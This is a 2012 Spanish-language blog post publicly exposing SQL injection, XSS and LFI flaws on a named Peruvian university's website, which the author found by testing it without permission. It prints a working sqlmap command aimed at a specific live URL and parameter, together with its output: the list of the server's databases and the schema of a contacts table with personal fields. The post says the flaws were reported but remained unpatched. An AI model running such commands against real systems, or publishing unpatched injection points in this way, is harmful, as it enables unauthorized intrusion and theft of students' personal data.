miércoles, 13 de junio de 2012

[SQL Injection] Universidad Nacional Mayor de San Marcos Perú


Hola, antes de empezar con  esta entrada, quiero dejar bien en claro que lo que escribiré acá no es con el fin de perjudicar a la Universidad ni a sus Alumnos.

Bueno, hace meses platicando con un amigo que es de Perú me comenta que estaba estudiando en la Universidad Nacional Mayor de San Marcos, entonces le pregunto si en dicha universidad brindaban buena enseñanza o que si tenia buena SEGURIDAD que es lo principal, en la cual yo de inmediato le dije que me enviara la pagina web de su universidad para comprobar que tal segura era... y como ya es de conocer que en esas universidad no siempre tienen lo que "dicen" o "publican", entonces retomando con lo que le prometí de revisar la seguridad, me tope con varias vulnerabilidades como XSS, SQL Injection, LFI, entonces lo primero que hice fue reportar la vulnerabilidad, que por cierto hasta ahora no me responden, es por eso que expondré lo siguiente.


Esta Universidad Peruana, la cual muchas personas comentan que tiene muy buen prestigio entre el publico peruano, NO tiene la suficiente seguridad que deberían brindarle a todos sus Alumnos, ya que esta exponiendo fácilmente toda la información (privada)  de cada uno de sus Alumnos y esta poniendo en riesgo la integridad fisica de los mismos.

Ustedes se preguntaran porque digo que los alumnos están corriendo riego? pues fácil, como ya todos sabemos que con tan solo saber los nombres completos + numero de celular o domicilio exacto, los alumnos corren el riesgo de ser secuestrados o extorsionados por personas inescrupulosas.

¿Pero como esas personas inescrupulosas se enteran de esto?

Actualmente muchas personas que con tal solo saber algo de "hacking" pueden aprovecharse de estos tipos de vulnerabilidades en webs universitarias, para obtener toda la base de datos y venderla a personas que solo buscan hacer daño.

Ahora veamos esta imagen:
"La UNMSM ocupa el puesto 46 en América Latina, según QS Top Universities"

Yo me pregunto... ¿Esta Universidad se merece este puesto?

En lo personal creo que una Universidad que expone toda la información de sus Alumnos a cualquier persona no merece dicho reconocimiento.

Ahora veamos, las vulnerabilidad y algunas de sus Base de Datos:

Vulnerabilidades: SQL Injection, XSS, LFI

Estas vulnerabilidades están desde hace ya mucho tiempo, bueno en mi caso yo las encontré en Febrero de este año, la cual hasta la actualidad siguen vigente.

Base de Datos desde el SQLMAP:

./sqlmap.py -u http://www.unmsm.edu.pe/eventos/index.php?id=3786-0 --dbs
available databases [28]:                                                                                                                                          
[*] agenda
[*] alemetal
[*] bdogbu
[*] blogfcc
[*] ccibc
[*] comunicacion
[*] dbderecho
[*] dbpsicologia
[*] derecho
[*] horde
[*] information_schema
[*] linuxbd
[*] mysql
[*] pay
[*] prensa
[*] prueba
[*] psicologiadb
[*] quimica1
[*] redtel
[*] rrpp
[*] sfalyc
[*] viceacademico
[*] webavedu
[*] webepg
[*] webfcc
[*] webgmmg
[*] webpeg
[*] webpre

Database: alemetal                                                                                                                                                              
Table: contactos
[9 columns]
+-------------+------------------+
| Column      | Type             |
+-------------+------------------+
| APELLIDO    | varchar(200)     |
| CODIGO      | int(11) unsigned |
| COMENTARIO  | varchar(255)     |
| DIRECCION   | varchar(200)     |
| EMAIL       | varchar(200)     |
| INFORMACION | varchar(255)     |
| INSTITUCION | varchar(200)     |
| NOMBRE      | varchar(200)     |
| TELEFONO    | varchar(200)     |
+-------------+------------------+

Bueno, colocaría mas datos sobre esta BD pero no quiero perjudicar a la Universidad ni a los Alumnos como mencione lineas arriba.

La vulnerabilidad ya fue respectivamente REPORTADA y espero que los administradores de esta Universidad tomen cartas en el asunto y brinden mas seguridad a sus alumnos y al publico en general que confía en ellos.

Saludos & hasta la próxima.



No hay comentarios:

Publicar un comentario en la entrada